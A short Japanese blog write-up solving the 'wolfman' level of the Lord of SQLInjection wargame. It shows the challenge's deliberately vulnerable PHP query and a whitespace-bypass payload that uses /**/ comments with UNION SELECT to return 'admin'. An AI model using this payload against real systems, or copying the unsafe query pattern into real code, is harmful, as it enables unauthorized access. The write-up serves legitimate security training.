はまやんはまやんはまやん

hamayanhamayan's blog

wolfman [LORD OF SQLINJECTION]

Lord of SQLInjection

include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
$query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
if($result['id'] == 'admin') solve("wolfman"); 
highlight_file(__FILE__); 

特徴は以下。

  • pwのみ入力するが、空白が含まれるとエラー
  • adminを返せばいい

これは有名なやつ

Space2Comment

/**/がスペースの代わりに使える。
'/**/union/**/select/**/'adminでAC